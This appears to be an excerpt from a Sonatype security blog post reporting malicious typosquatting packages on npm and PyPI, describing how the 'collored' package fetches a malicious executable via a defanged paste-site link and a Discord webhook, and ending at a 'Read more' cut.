Sonatype is seeing an upsurge in suspicious and malicious packages infiltrating multiple open source repositories since last month, creeping into this week.

This week, we have identified 130 typosquatting packages on npm and a dozen malicious packages on the PyPI repository. The discovery was made by Sonatype’s automated malware detection systems, offered as a part of Nexus Firewall.

The timing of these attacks is rather interesting—when the world is focused on the Russia-Ukraine crisis and governments are urging organizations to step up cyber security efforts in response to related malicious cyber incidents.

As minds and hearts of most professionals are focused on the ongoing developments, opportunistic threat actors may get incentivized to renew their old tactics—from infiltrating open source repos with malicious typosquats to leveraging dependency confusion attacks that just won’t go away.  

New malicious PyPI packages

Where to begin, it’s been a busy week for members of our security research team. My researcher colleagues Ankita Lamba and Juan Aguirre have been relentlessly tracking suspicious activity in the form of hundreds of counterfeit packages seen on npm and PyPI registries, and responsibly reporting these findings to the repo maintainers.

Collored vs. colored

While the official colored package is a “simple library for color and formatting to terminal,” the malicious typosquat “collored” identified by Sonatype this week spins up a malicious EXE on the infected machine.

Instead of packing the executable within the package, however, “collored” makes an HTTP request to a hardcoded rentry[.]co link:

The rentry[.]co URL provides a Discord webhook address to a suspicious executable: srv.exe, which at the time of our submission, was identified as malicious by multiple antivirus engines on VirusTotal.

“collored” is tracked as sonatype-2022-1141 in our security research data.

What’s in a name?

Further, we deep dive into a rather (Read more...)